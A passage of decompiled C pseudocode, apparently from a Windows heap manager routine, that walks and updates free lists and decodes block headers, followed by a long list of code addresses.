												__eflags = _t733 - _t1018;
												if(_t733 == _t1018) {
													goto L199;
												}
												_t1125 =  *(_t791 + 0x4c);
												__eflags = _t1125;
												if(_t1125 == 0) {
													_t740 =  *(_t1018 - 8) & 0x0000ffff;
												} else {
													_t1043 =  *(_t1018 - 8);
													_t1125 =  *(_t791 + 0x4c);
													__eflags = _t1125 & _t1043;
													if((_t1125 & _t1043) != 0) {
														_t1043 = _t1043 ^  *(_t791 + 0x50);
														__eflags = _t1043;
													}
													_t740 = _t1043 & 0x0000ffff;
												}
												_t733 = _a16;
												__eflags = _v8 - (_t740 & 0x0000ffff);
												if(_v8 - (_t740 & 0x0000ffff) <= 0) {
													_t1030 =  *_t733 - 8;
													__eflags = _t1125;
													if(_t1125 == 0) {
														_t742 =  *_t1030 & 0x0000ffff;
													} else {
														_t1042 =  *_t1030;
														_t1125 =  *(_t791 + 0x4c);
														__eflags = _t1125 & _t1042;
														if((_t1125 & _t1042) != 0) {
															_t1042 = _t1042 ^  *(_t791 + 0x50);
															__eflags = _t1042;
														}
														_t742 = _t1042 & 0x0000ffff;
													}
													__eflags = _v8 - (_t742 & 0x0000ffff);
													if(_v8 - (_t742 & 0x0000ffff) <= 0) {
														_t733 =  *_a16;
														goto L199;
													} else {
														_t745 = _a12;
														__eflags =  *_t745;
														if( *_t745 != 0) {
															L189:
															_t746 = _a12;
															_t1034 =  *((intOrPtr*)(_t746 + 4)) -  *_t1064;
															_t1131 = _t887 >> 5;
															_t1064 =  *((intOrPtr*)(_t746 + 0x1c)) + _t1131 * 4;
															_t1036 = (_t1034 >> 5) - 1;
															_t753 =  !((1 << (_t887 & 0x0000001f)) - 1) &  *_t1064;
															__eflags = 1;
															if(1 == 0) {
																while(1) {
																	__eflags = _t1131 - _t1036;
																	if(_t1131 > _t1036) {
																		break;
																	}
																	_t1064 = _t1064 + 4;
																	_t753 =  *_t1064;
																	_t1131 = _t1131 + 1;
																	__eflags = _t753;
																	if(_t753 == 0) {
																		continue;
																	}
																	break;
																}
																__eflags = _t753;
																if(_t753 == 0) {
																	_a8 = _a8 & 0x00000000;
																	L200:
																	_t734 = _a8;
																	__eflags = _t734;
																	if(_t734 == 0) {
																		_t888 =  *_a12;
																		_t1064 = _t888 + 0x14;
																		_a12 = _t888;
																		_a20 =  *_t1064;
																		continue;
																	}
																	L201:
																	_t1126 = _t791 + 0xc4;
																	__eflags = _t1126 - _t734;
																	if(_t1126 == _t734) {
																		L208:
																		_t889 =  *(_t734 + 4);
																		_t1019 =  *_t889;
																		_t1128 = _a4 + 8;
																		_a12 = _t1128;
																		__eflags = _t1019 - _t734;
																		if(__eflags != 0) {
																			_push(0);
																			_push(_t1019);
																			_push(0);
																			_push(_t734);
																			_push(0);
																			_push(0xc);
																			E0099F840(_t791, 0, _t1019, _t1064, _t1128, __eflags);
																		} else {
																			 *_t1128 = _t734;
																			_t1128[2] = _t889;
																			 *_t889 = _t1128;
																			 *(_t734 + 4) = _t1128;
																		}
																		 *((intOrPtr*)(_t791 + 0x78)) =  *((intOrPtr*)(_t791 + 0x78)) + ( *_a4 & 0x0000ffff);
																		_t622 =  *(_t791 + 0xb8);
																		__eflags = _t622;
																		if(_t622 == 0) {
																			L49:
																			if( *(_t791 + 0x4c) != 0) {
																				_t624 = _a4;
																				_t624[0] = _t624[0] ^  *_t624 ^ _t624[0];
																				 *_t624 =  *_t624 ^  *(_t791 + 0x50);
																			}
																			goto L51;
																		} else {
																			_t892 =  *_a4 & 0x0000ffff;
																			while(1) {
																				__eflags = _t892 -  *((intOrPtr*)(_t622 + 4));
																				if(_t892 <  *((intOrPtr*)(_t622 + 4))) {
																					break;
																				}
																				_t1020 =  *_t622;
																				__eflags = _t1020;
																				if(_t1020 == 0) {
																					_t892 =  *((intOrPtr*)(_t622 + 4)) - 1;
																					break;
																				}
																				_t622 = _t1020;
																			}
																			_t1022 = _t892 -  *((intOrPtr*)(_t622 + 0x14));
																			__eflags =  *(_t622 + 8);
																			_a8 = _t1022;
																			if( *(_t622 + 8) != 0) {
																				_t1022 = _t1022 + _t1022;
																				__eflags = _t1022;
																			}
																			 *((intOrPtr*)(_t622 + 0xc)) =  *((intOrPtr*)(_t622 + 0xc)) + 1;
																			_t1088 = _t1022 << 2;
																			_t1075 =  *(_t1088 +  *((intOrPtr*)(_t622 + 0x20)));
																			__eflags = _t892 -  *((intOrPtr*)(_t622 + 4)) - 1;
																			if(_t892 ==  *((intOrPtr*)(_t622 + 4)) - 1) {
																				 *((intOrPtr*)(_t622 + 0x10)) =  *((intOrPtr*)(_t622 + 0x10)) + 1;
																			}
																			__eflags = _t1075;
																			if(_t1075 == 0) {
																				L46:
																				 *(_t1088 +  *((intOrPtr*)(_t622 + 0x20))) = _a12;
																				goto L47;
																			} else {
																				__eflags =  *(_t791 + 0x4c);
																				if( *(_t791 + 0x4c) == 0) {
																					L274:
																					_t816 =  *(_t1075 - 8) & 0x0000ffff;
																					L77:
																					__eflags = ( *_a4 & 0x0000ffff) - (_t816 & 0x0000ffff);
																					if(( *_a4 & 0x0000ffff) - (_t816 & 0x0000ffff) <= 0) {
																						goto L46;
																					}
																					L47:
																					if(_t1075 == 0) {
																						 *( *((intOrPtr*)(_t622 + 0x1c)) + (_a8 >> 5) * 4) =  *( *((intOrPtr*)(_t622 + 0x1c)) + (_a8 >> 5) * 4) | 1;
																					}
																					goto L49;
																				}
																				_t941 =  *(_t1075 - 8);
																				__eflags =  *(_t791 + 0x4c) & _t941;
																				L74:
																				if(__eflags != 0) {
																					_t941 = _t941 ^  *(_t791 + 0x50);
																					__eflags = _t941;
																				}
																				_t816 = _t941 & 0x0000ffff;
																				goto L77;
																			}
																		}
																	}
																	_t1026 =  *(_t791 + 0x4c);
																	while(1) {
																		__eflags = _t1026;
																		if(_t1026 == 0) {
																			_t894 =  *(_t734 - 8) & 0x0000ffff;
																		} else {
																			_t896 =  *(_t734 - 8);
																			_t1026 =  *(_t791 + 0x4c);
																			__eflags = _t1026 & _t896;
																			if((_t1026 & _t896) != 0) {
																				_t896 = _t896 ^  *(_t791 + 0x50);
																				__eflags = _t896;
																			}
																			_t894 = _t896 & 0x0000ffff;
																		}
																		__eflags = _v8 - (_t894 & 0x0000ffff);
																		if(_v8 <= (_t894 & 0x0000ffff)) {
																			goto L208;
																		}
																		_t734 =  *_t734;
																		__eflags = _t1126 - _t734;
																		if(_t1126 == _t734) {
																			goto L208;
																		}
																	}
																	goto L208;
																}
																L194:
																__eflags = _t753 & 0x0000ffff;
																if((_t753 & 0x0000ffff) != 0) {
																	_t1038 = _t753 & 0x000000ff;
																	__eflags = _t1038;
																	if(_t1038 == 0) {
																		_t349 = (_t753 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
																		_t757 = ( *_t349 & 0x000000ff) + 8;
																	} else {
																		_t348 = _t1038 + 0x9037f8; // 0x10008
																		_t757 =  *_t348 & 0x000000ff;
																	}
																} else {
																	_t903 = _t753 >> 0x00000010 & 0x000000ff;
																	__eflags = _t903;
																	if(_t903 != 0) {
																		_t142 = _t903 + 0x9037f8; // 0x10008
																		_t757 = ( *_t142 & 0x000000ff) + 0x10;
																	} else {
																		_t307 = (_t753 >> 0x18) + 0x9037f8; // 0x10008
																		_t757 = ( *_t307 & 0x000000ff) + 0x18;
																		__eflags = _t757;
																	}
																}
																_t1133 = (_t1131 << 5) + _t757;
																_t758 = _a12;
																__eflags =  *(_t758 + 8);
																_t900 = _t1133 + _t1133;
																if( *(_t758 + 8) == 0) {
																	_t900 = _t1133;
																}
																_t733 =  *( *((intOrPtr*)(_t758 + 0x20)) + _t900 * 4);
																goto L199;
															}
															goto L194;
														}
														__eflags = _a20 - _t745[2] - 1;
														if(_a20 == _t745[2] - 1) {
															_t765 = _a12;
															__eflags =  *(_t765 + 8);
															if( *(_t765 + 8) != 0) {
																_t887 = _t887 + _t887;
																__eflags = _t887;
															}
															_t904 =  *((intOrPtr*)( *((intOrPtr*)(_t765 + 0x20)) + _t887 * 4));
															while(1) {
																__eflags = _a16 - _t904;
																if(_a16 == _t904) {
																	break;
																}
																__eflags = _t1125;
																if(_t1125 == 0) {
																	_t767 =  *(_t904 - 8) & 0x0000ffff;
																} else {
																	_t1041 =  *(_t904 - 8);
																	_t1125 =  *(_t791 + 0x4c);
																	__eflags = _t1125 & _t1041;
																	if((_t1125 & _t1041) != 0) {
																		_t1041 = _t1041 ^  *(_t791 + 0x50);
																		__eflags = _t1041;
																	}
																	_t767 = _t1041 & 0x0000ffff;
																}
																__eflags = _v8 - (_t767 & 0x0000ffff);
																if(_v8 - (_t767 & 0x0000ffff) <= 0) {
																	_a8 = _t904;
																	goto L200;
																} else {
																	_t904 =  *_t904;
																	continue;
																}
															}
															goto L200;
														}
														goto L189;
													}
												}
												L199:
												_a8 = _t733;
												goto L200;
											}
										}
										_t734 =  *(_t791 + 0xc4);
										goto L201;
									}
								}
								_t909 =  *_t1082 & 0x0000ffff;
								while(1) {
									__eflags = _t909 -  *((intOrPtr*)(_t685 + 4));
									if(_t909 <  *((intOrPtr*)(_t685 + 4))) {
										break;
									}
									_t1044 =  *_t685;
									__eflags = _t1044;
									if(_t1044 == 0) {
										_t1078 =  *((intOrPtr*)(_t685 + 4)) - 1;
										_a8 = _t1078;
										L154:
										_t911 = _t1078 -  *((intOrPtr*)(_t685 + 0x14));
										__eflags =  *(_t685 + 8);
										_v8 = _t911;
										if( *(_t685 + 8) != 0) {
											_t911 = _t911 + _t911;
											__eflags = _t911;
										}
										_t912 = _t911 << 2;
										_t1046 =  *((intOrPtr*)(_t685 + 0x20)) + _t912;
										_a16 = _t912;
										 *((intOrPtr*)(_t685 + 0xc)) =  *((intOrPtr*)(_t685 + 0xc)) - 1;
										_v16 =  *_t1046;
										__eflags = _t1078 -  *((intOrPtr*)(_t685 + 4)) - 1;
										if(_t1078 ==  *((intOrPtr*)(_t685 + 4)) - 1) {
											 *((intOrPtr*)(_t685 + 0x10)) =  *((intOrPtr*)(_t685 + 0x10)) - 1;
										}
										_t236 =  &(_t1082[4]); // 0x8
										__eflags = _v16 - _t236;
										if(_v16 != _t236) {
											L167:
											_t1064 = _a4;
											goto L168;
										} else {
											__eflags =  *_t685;
											_t917 =  *((intOrPtr*)(_t685 + 4));
											if( *_t685 == 0) {
												_t917 = _t917 - 1;
											}
											__eflags = _a8 - _t917;
											_t918 = _t1082[4];
											if(_a8 >= _t917) {
												_t1064 = _a4;
												__eflags = _t918 -  *((intOrPtr*)(_t685 + 0x18));
												if(_t918 !=  *((intOrPtr*)(_t685 + 0x18))) {
													 *_t1046 = _t918;
												} else {
													 *_t1046 =  *_t1046 & 0x00000000;
													 *( *((intOrPtr*)(_t685 + 0x1c)) + (_v8 >> 5) * 4) =  *( *((intOrPtr*)(_t685 + 0x1c)) + (_v8 >> 5) * 4) &  !(1 << (_v8 & 0x0000001f));
												}
												goto L168;
											} else {
												__eflags = _t918 -  *((intOrPtr*)(_t685 + 0x18));
												if(_t918 ==  *((intOrPtr*)(_t685 + 0x18))) {
													L166:
													 *(_a16 +  *((intOrPtr*)(_t685 + 0x20))) =  *(_a16 +  *((intOrPtr*)(_t685 + 0x20))) & 0x00000000;
													_t922 = _v8;
													_t789 =  *((intOrPtr*)(_t685 + 0x1c)) + (_t922 >> 5) * 4;
													 *_t789 =  *_t789 &  !(1 << (_t922 & 0x0000001f));
													__eflags =  *_t789;
													goto L167;
												}
												__eflags =  *(_t791 + 0x4c);
												if( *(_t791 + 0x4c) == 0) {
													_t1060 =  *(_t918 - 8) & 0x0000ffff;
												} else {
													_t1063 =  *(_t918 - 8);
													__eflags =  *(_t791 + 0x4c) & _t1063;
													if(( *(_t791 + 0x4c) & _t1063) != 0) {
														_t1063 = _t1063 ^  *(_t791 + 0x50);
														__eflags = _t1063;
													}
													_t1060 = _t1063 & 0x0000ffff;
												}
												__eflags = ( *_t1082 & 0x0000ffff) == (_t1060 & 0x0000ffff);
												if(( *_t1082 & 0x0000ffff) == (_t1060 & 0x0000ffff)) {
													 *(_a16 +  *((intOrPtr*)(_t685 + 0x20))) = _t918;
													goto L167;
												} else {
													goto L166;
												}
											}
										}
									}
									_t685 = _t1044;
								}
								_t1078 = _t909;
								_a8 = _t909;
								goto L154;
							}
							L284:
							_t1082 = _v28;
							_v12 = 1;
							__eflags = ( *(_t791 + 0x4c) >> 0x00000014 &  *(_t791 + 0x52) ^ _t1082[1]) & 0x00000001;
						} while (__eflags == 0);
						_t596 = _a20;
					}
					_t1082[2] =  *(_t791 + 0x54) ^ _t596;
					 *((char*)(_t1064 + 7)) = 0;
					if(_a12 != 0) {
						 *(_t1064 + 2) =  *(_t1064 + 2) & 0x000000f0;
						__eflags =  *(_t791 + 0x40) & 0x00000040;
						_t1083 = _t596 & 0x0000ffff;
						_a16 = _t1083;
						if(( *(_t791 + 0x40) & 0x00000040) != 0) {
							E009289F0(_t1064 + 0x10, _t1083 * 8 - 0x10, 0xfeeefeee);
							 *(_t1064 + 2) =  *(_t1064 + 2) | 0x00000004;
						}
						_t612 =  *(_t791 + 0xb8);
						__eflags = _t612;
						if(_t612 != 0) {
							while(1) {
								__eflags = _t1083 -  *((intOrPtr*)(_t612 + 4));
								if(_t1083 <  *((intOrPtr*)(_t612 + 4))) {
									break;
								}
								_t802 =  *_t612;
								__eflags = _t802;
								if(_t802 == 0) {
									_t804 =  *((intOrPtr*)(_t612 + 4)) - 1;
									_v8 = _t804;
									L97:
									_a12 = _t612;
									_t613 = _t612 + 0x14;
									__eflags = _t613;
									_a20 = _t613;
									while(1) {
										_t805 = _t804 -  *_a20;
										_t616 = _a12[0xc];
										_t927 =  *((intOrPtr*)(_t616 + 4));
										__eflags = _t616 - _t927;
										if(_t616 == _t927) {
											goto L120;
										}
										_t1064 =  *(_t791 + 0x4c);
										__eflags = _t1064;
										if(_t1064 == 0) {
											_t944 =  *(_t927 - 8) & 0x0000ffff;
										} else {
											_t965 =  *(_t927 - 8);
											_t1064 =  *(_t791 + 0x4c);
											__eflags = _t1064 & _t965;
											if((_t1064 & _t965) != 0) {
												_t965 = _t965 ^  *(_t791 + 0x50);
												__eflags = _t965;
											}
											_t944 = _t965 & 0x0000ffff;
										}
										__eflags = _t1083 - (_t944 & 0x0000ffff);
										if(_t1083 - (_t944 & 0x0000ffff) <= 0) {
											_t947 =  *_t616 - 8;
											__eflags = _t1064;
											if(_t1064 == 0) {
												_t948 =  *_t947 & 0x0000ffff;
											} else {
												_t964 =  *_t947;
												_t1064 =  *(_t791 + 0x4c);
												__eflags = _t1064 & _t964;
												if((_t1064 & _t964) != 0) {
													_t964 = _t964 ^  *(_t791 + 0x50);
													__eflags = _t964;
												}
												_t948 = _t964 & 0x0000ffff;
											}
											__eflags = _a16 - (_t948 & 0x0000ffff);
											if(_a16 - (_t948 & 0x0000ffff) <= 0) {
												_t616 =  *_t616;
												goto L120;
											} else {
												_t950 = _a12;
												__eflags =  *_t950;
												if( *_t950 == 0) {
													__eflags = _v8 - _t950[2] - 1;
													if(_v8 != _t950[2] - 1) {
														goto L110;
													}
													_t959 = _a12;
													__eflags =  *(_t959 + 8);
													if( *(_t959 + 8) != 0) {
														_t805 = _t805 + _t805;
														__eflags = _t805;
													}
													_t832 =  *((intOrPtr*)( *((intOrPtr*)(_t959 + 0x20)) + _t805 * 4));
													while(1) {
														__eflags = _t616 - _t832;
														if(_t616 == _t832) {
															break;
														}
														__eflags = _t1064;
														if(_t1064 == 0) {
															_t961 =  *(_t832 - 8) & 0x0000ffff;
														} else {
															_t963 =  *(_t832 - 8);
															_t1064 =  *(_t791 + 0x4c);
															__eflags = _t1064 & _t963;
															if((_t1064 & _t963) != 0) {
																_t963 = _t963 ^  *(_t791 + 0x50);
																__eflags = _t963;
															}
															_t961 = _t963 & 0x0000ffff;
														}
														__eflags = _a16 - (_t961 & 0x0000ffff);
														if(_a16 - (_t961 & 0x0000ffff) > 0) {
															_t832 =  *_t832;
															continue;
														} else {
															_a8 = _t832;
															break;
														}
													}
													L121:
													_t617 = _a8;
													__eflags = _t617;
													if(_t617 == 0) {
														_t806 =  *_a12;
														_t1083 = _a16;
														_a12 = _t806;
														_t807 = _t806 + 0x14;
														_a20 = _t807;
														_t804 =  *_t807;
														_v8 = _t804;
														continue;
													}
													goto L122;
												}
												L110:
												_t629 = _a12;
												_t1093 = _t805 >> 5;
												_t1064 =  *((intOrPtr*)(_t629 + 0x1c)) + _t1093 * 4;
												_t956 = ( *((intOrPtr*)(_t629 + 4)) -  *_a20 >> 5) - 1;
												_t636 =  !((1 << (_t805 & 0x0000001f)) - 1) &  *_t1064;
												__eflags = 1;
												if(1 == 0) {
													while(1) {
														__eflags = _t1093 - _t956;
														if(_t1093 > _t956) {
															break;
														}
														_t1064 = _t1064 + 4;
														_t636 =  *_t1064;
														_t1093 = _t1093 + 1;
														__eflags = _t636;
														if(_t636 == 0) {
															continue;
														}
														break;
													}
													__eflags = _t636;
													if(_t636 == 0) {
														_a8 = _a8 & 0x00000000;
														goto L121;
													}
													L115:
													__eflags = _t636 & 0x0000ffff;
													if((_t636 & 0x0000ffff) != 0) {
														_t958 = _t636 & 0x000000ff;
														__eflags = _t958;
														if(_t958 == 0) {
															_t365 = (_t636 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
															_t640 = ( *_t365 & 0x000000ff) + 8;
														} else {
															_t364 = _t958 + 0x9037f8; // 0x10008
															_t640 =  *_t364 & 0x000000ff;
														}
													} else {
														_t831 = _t636 >> 0x00000010 & 0x000000ff;
														__eflags = _t831;
														if(_t831 != 0) {
															_t366 = _t831 + 0x9037f8; // 0x10008
															_t640 = ( *_t366 & 0x000000ff) + 0x10;
														} else {
															_t184 = (_t636 >> 0x18) + 0x9037f8; // 0x10008
															_t640 = ( *_t184 & 0x000000ff) + 0x18;
															__eflags = _t640;
														}
													}
													_t1095 = (_t1093 << 5) + _t640;
													_t641 = _a12;
													__eflags =  *(_t641 + 8);
													_t828 = _t1095 + _t1095;
													if( *(_t641 + 8) == 0) {
														_t828 = _t1095;
													}
													_t616 =  *( *((intOrPtr*)(_t641 + 0x20)) + _t828 * 4);
													goto L120;
												}
												goto L115;
											}
										}
										L120:
										_a8 = _t616;
										goto L121;
									}
								}
								_t612 = _t802;
							}
							_t804 = _t1083;
							_v8 = _t1083;
							goto L97;
						} else {
							_t617 =  *(_t791 + 0xc4);
							L122:
							_t1084 = _t791 + 0xc4;
							__eflags = _t1084 - _t617;
							if(_t1084 == _t617) {
								L129:
								_t808 =  *(_t617 + 4);
								_t928 =  *_t808;
								_t1086 = _a4 + 8;
								_a12 = _t1086;
								__eflags = _t928 - _t617;
								if(__eflags != 0) {
									_push(0);
									_push(_t928);
									_push(0);
									_push(_t617);
									_push(0);
									_push(0xc);
									E0099F840(_t791, 0, _t928, _t1064, _t1086, __eflags);
								} else {
									 *_t1086 = _t617;
									_t1086[2] = _t808;
									 *_t808 = _t1086;
									 *(_t617 + 4) = _t1086;
								}
								 *((intOrPtr*)(_t791 + 0x78)) =  *((intOrPtr*)(_t791 + 0x78)) + ( *_a4 & 0x0000ffff);
								_t622 =  *(_t791 + 0xb8);
								__eflags = _t622;
								if(_t622 == 0) {
									goto L49;
								} else {
									_t815 =  *_a4 & 0x0000ffff;
									while(1) {
										__eflags = _t815 -  *((intOrPtr*)(_t622 + 4));
										if(_t815 <  *((intOrPtr*)(_t622 + 4))) {
											break;
										}
										_t942 =  *_t622;
										__eflags = _t942;
										if(_t942 == 0) {
											L83:
											_t815 =  *((intOrPtr*)(_t622 + 4)) - 1;
											break;
										}
										_t622 = _t942;
									}
									L42:
									_t930 = _t815 -  *((intOrPtr*)(_t622 + 0x14));
									_a8 = _t930;
									if( *(_t622 + 8) != 0) {
										_t930 = _t930 + _t930;
									}
									_t1088 = _t930 << 2;
									 *((intOrPtr*)(_t622 + 0xc)) =  *((intOrPtr*)(_t622 + 0xc)) + 1;
									_t1075 =  *(_t1088 +  *((intOrPtr*)(_t622 + 0x20)));
									if(_t815 ==  *((intOrPtr*)(_t622 + 4)) - 1) {
										 *((intOrPtr*)(_t622 + 0x10)) =  *((intOrPtr*)(_t622 + 0x10)) + 1;
									}
									if(_t1075 != 0) {
										__eflags =  *(_t791 + 0x4c);
										if( *(_t791 + 0x4c) == 0) {
											goto L274;
										}
										_t941 =  *(_t1075 - 8);
										__eflags =  *(_t791 + 0x4c) & _t941;
										goto L74;
									} else {
										goto L46;
									}
								}
							}
							_t943 =  *(_t791 + 0x4c);
							while(1) {
								__eflags = _t943;
								if(_t943 == 0) {
									_t822 =  *(_t617 - 8) & 0x0000ffff;
								} else {
									_t824 =  *(_t617 - 8);
									_t943 =  *(_t791 + 0x4c);
									__eflags = _t943 & _t824;
									if((_t943 & _t824) != 0) {
										_t824 = _t824 ^  *(_t791 + 0x50);
										__eflags = _t824;
									}
									_t822 = _t824 & 0x0000ffff;
								}
								__eflags = _a16 - (_t822 & 0x0000ffff);
								if(_a16 <= (_t822 & 0x0000ffff)) {
									goto L129;
								}
								_t617 =  *_t617;
								__eflags = _t1084 - _t617;
								if(_t1084 == _t617) {
									goto L129;
								}
							}
							goto L129;
						}
					}
					_t833 = _t596 & 0x0000ffff;
					 *(_t1064 + 2) = 0;
					_t646 =  *(_t791 + 0xb8);
					_v8 = _t833;
					if(_t646 == 0) {
						_t647 =  *(_t791 + 0xc4);
						L30:
						_t1098 = _t791 + 0xc4;
						if(_t1098 == _t647) {
							L37:
							_t834 =  *(_t647 + 4);
							_t966 =  *_t834;
							_t1100 = _a4 + 8;
							_a12 = _t1100;
							if(_t966 != _t647) {
								_push(0);
								_push(_t966);
								_push(0);
								_push(_t647);
								_push(0);
								_push(0xc);
								E0099F840(_t791, 0, _t966, _t1064, _t1100, __eflags);
							} else {
								 *_t1100 = _t647;
								_t1100[2] = _t834;
								 *_t834 = _t1100;
								 *(_t647 + 4) = _t1100;
							}
							 *((intOrPtr*)(_t791 + 0x78)) =  *((intOrPtr*)(_t791 + 0x78)) + ( *_a4 & 0x0000ffff);
							_t622 =  *(_t791 + 0xb8);
							if(_t622 == 0) {
								goto L49;
							} else {
								_t815 =  *_a4 & 0x0000ffff;
								while(_t815 >=  *((intOrPtr*)(_t622 + 4))) {
									_t967 =  *_t622;
									__eflags = _t967;
									if(_t967 == 0) {
										goto L83;
									}
									_t622 = _t967;
								}
								goto L42;
							}
						} else {
							_t968 =  *(_t791 + 0x4c);
							L32:
							L32:
							if(_t968 == 0) {
								_t837 =  *(_t647 - 8) & 0x0000ffff;
							} else {
								_t839 =  *(_t647 - 8);
								_t968 =  *(_t791 + 0x4c);
								if((_t968 & _t839) != 0) {
									_t839 = _t839 ^  *(_t791 + 0x50);
								}
								_t837 = _t839 & 0x0000ffff;
							}
							if(_v8 > (_t837 & 0x0000ffff)) {
								goto L288;
							}
							goto L37;
							L288:
							_t647 =  *_t647;
							__eflags = _t1098 - _t647;
							if(__eflags == 0) {
								goto L37;
							}
							goto L32;
						}
					}
					while(_t833 >=  *((intOrPtr*)(_t646 + 4))) {
						_t969 =  *_t646;
						__eflags = _t969;
						if(__eflags == 0) {
							_t833 =  *((intOrPtr*)(_t646 + 4)) - 1;
							break;
						}
						_t646 = _t969;
					}
					_a12 = _t646;
					_a20 = _t833;
					_t1064 = _t646 + 0x14;
					while(1) {
						_t652 = _a12[0xc];
						_t970 =  *((intOrPtr*)(_t652 + 4));
						_t842 = _a20 -  *_t1064;
						_a16 = _t652;
						if(_t652 == _t970) {
							goto L28;
						}
						_t1101 =  *(_t791 + 0x4c);
						if(_t1101 == 0) {
							_t655 =  *(_t970 - 8) & 0x0000ffff;
						} else {
							_t987 =  *(_t970 - 8);
							_t1101 =  *(_t791 + 0x4c);
							if((_t1101 & _t987) != 0) {
								_t987 = _t987 ^  *(_t791 + 0x50);
							}
							_t655 = _t987 & 0x0000ffff;
						}
						_t652 = _a16;
						if(_v8 - (_t655 & 0x0000ffff) <= 0) {
							_t974 =  *_t652 - 8;
							if(_t1101 == 0) {
								_t657 =  *_t974 & 0x0000ffff;
							} else {
								_t986 =  *_t974;
								_t1101 =  *(_t791 + 0x4c);
								if((_t1101 & _t986) != 0) {
									_t986 = _t986 ^  *(_t791 + 0x50);
								}
								_t657 = _t986 & 0x0000ffff;
							}
							if(_v8 - (_t657 & 0x0000ffff) <= 0) {
								_t652 =  *_a16;
								goto L28;
							} else {
								_t660 = _a12;
								if( *_t660 == 0) {
									__eflags = _a20 -  *((intOrPtr*)(_t660 + 4)) - 1;
									if(__eflags != 0) {
										goto L19;
									}
									_t680 = _a12;
									__eflags =  *(_t680 + 8);
									if( *(_t680 + 8) != 0) {
										_t842 = _t842 + _t842;
										__eflags = _t842;
									}
									_t851 =  *((intOrPtr*)( *((intOrPtr*)(_t680 + 0x20)) + _t842 * 4));
									while(1) {
										__eflags = _a16 - _t851;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t1101;
										if(_t1101 == 0) {
											_t682 =  *(_t851 - 8) & 0x0000ffff;
										} else {
											_t985 =  *(_t851 - 8);
											_t1101 =  *(_t791 + 0x4c);
											__eflags = _t1101 & _t985;
											if((_t1101 & _t985) != 0) {
												_t985 = _t985 ^  *(_t791 + 0x50);
												__eflags = _t985;
											}
											_t682 = _t985 & 0x0000ffff;
										}
										__eflags = _v8 - (_t682 & 0x0000ffff);
										if(__eflags > 0) {
											_t851 =  *_t851;
											continue;
										} else {
											_a8 = _t851;
											break;
										}
									}
									L29:
									_t647 = _a8;
									if(_t647 == 0) {
										_t843 =  *_a12;
										_t1064 = _t843 + 0x14;
										_a12 = _t843;
										_a20 =  *_t1064;
										continue;
									}
									goto L30;
								}
								L19:
								_t663 = _a12;
								_t978 =  *((intOrPtr*)(_t663 + 4)) -  *_t1064;
								_t1103 = _t842 >> 5;
								_t1064 =  *((intOrPtr*)(_t663 + 0x1c)) + _t1103 * 4;
								_t980 = (_t978 >> 5) - 1;
								_t670 =  !((1 << (_t842 & 0x0000001f)) - 1) &  *_t1064;
								if(1 != 0) {
									L23:
									if((_t670 & 0x0000ffff) == 0) {
										_t848 = _t670 >> 0x00000010 & 0x000000ff;
										__eflags = _t848;
										if(__eflags != 0) {
											_t128 = _t848 + 0x9037f8; // 0x10008
											_t672 = ( *_t128 & 0x000000ff) + 0x10;
										} else {
											_t127 = (_t670 >> 0x18) + 0x9037f8; // 0x10008
											_t672 = ( *_t127 & 0x000000ff) + 0x18;
										}
									} else {
										_t982 = _t670 & 0x000000ff;
										if(_t982 == 0) {
											_t105 = (_t670 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
											_t672 = ( *_t105 & 0x000000ff) + 8;
										} else {
											_t56 = _t982 + 0x9037f8; // 0x10008
											_t672 =  *_t56 & 0x000000ff;
										}
									}
									_t1105 = (_t1103 << 5) + _t672;
									_t673 = _a12;
									_t849 = _t1105 + _t1105;
									if(_t673[4] == 0) {
										_t849 = _t1105;
									}
									_t652 =  *(_t673[0x10] + _t849 * 4);
									goto L28;
								}
								while(_t1103 <= _t980) {
									_t1064 = _t1064 + 4;
									_t670 =  *_t1064;
									_t1103 = _t1103 + 1;
									if(_t670 == 0) {
										continue;
									}
									break;
								}
								if(_t670 == 0) {
									_a8 = _a8 & 0x00000000;
									goto L29;
								}
								goto L23;
							}
						}
						L28:
						_a8 = _t652;
						goto L29;
					}
				}
			}






























































































































































































































                                                0x0090351f
                                                0x0090352d
                                                0x00903530
                                                0x00903532
                                                0x00903535
                                                0x00903543
                                                0x00903547
                                                0x0090354a
                                                0x0090354f
                                                0x00904828
                                                0x00904829
                                                0x0090482b
                                                0x0090482e
                                                0x0095a32b
                                                0x0095a32b
                                                0x0095a32c
                                                0x0095a32d
                                                0x0095a32e
                                                0x0095a32f
                                                0x0095a330
                                                0x0095a332
                                                0x0095a337
                                                0x00000000
                                                0x0095a337
                                                0x00904834
                                                0x00904839
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00903555
                                                0x00903555
                                                0x00903557
                                                0x00903557
                                                0x0090355a
                                                0x0090355d
                                                0x00903561
                                                0x0090356d
                                                0x00903573
                                                0x00903579
                                                0x00923683
                                                0x00923683
                                                0x00923687
                                                0x0092368c
                                                0x00923696
                                                0x00923699
                                                0x0095a33f
                                                0x0095a341
                                                0x0095a342
                                                0x0095a343
                                                0x0095a343
                                                0x00923699
                                                0x0092369f
                                                0x009236a2
                                                0x009236a2
                                                0x009236a5
                                                0x009236a7
                                                0x009236aa
                                                0x009236ad
                                                0x009236b0
                                                0x009236b2
                                                0x009236b4
                                                0x0095a35c
                                                0x0095a35c
                                                0x0095a35e
                                                0x0095a35f
                                                0x0095a360
                                                0x0095a361
                                                0x0095a362
                                                0x0095a364
                                                0x00000000
                                                0x009236ba
                                                0x009236ba
                                                0x009236bc
                                                0x00000000
                                                0x00000000
                                                0x009236c5
                                                0x009236c8
                                                0x009236ce
                                                0x009236d0
                                                0x00923788
                                                0x00923788
                                                0x0092378b
                                                0x0092378e
                                                0x00923790
                                                0x00923793
                                                0x00923797
                                                0x00949005
                                                0x0094900a
                                                0x0094900c
                                                0x00000000
                                                0x00000000
                                                0x0095a355
                                                0x0095a369
                                                0x0095a369
                                                0x0095a36d
                                                0x00000000
                                                0x0095a420
                                                0x00000000
                                                0x0095a36d
                                                0x0092379d
                                                0x0092379d
                                                0x009237a1
                                                0x0095a427
                                                0x0095a42a
                                                0x0095a42c
                                                0x0095a435
                                                0x0095a43c
                                                0x0095a43f
                                                0x0095a441
                                                0x0095a443
                                                0x0095a446
                                                0x0095a448
                                                0x0095a448
                                                0x0095a448
                                                0x0095a448
                                                0x0095a446
                                                0x0095a454
                                                0x0095a458
                                                0x0095a45d
                                                0x0095a460
                                                0x0095a463
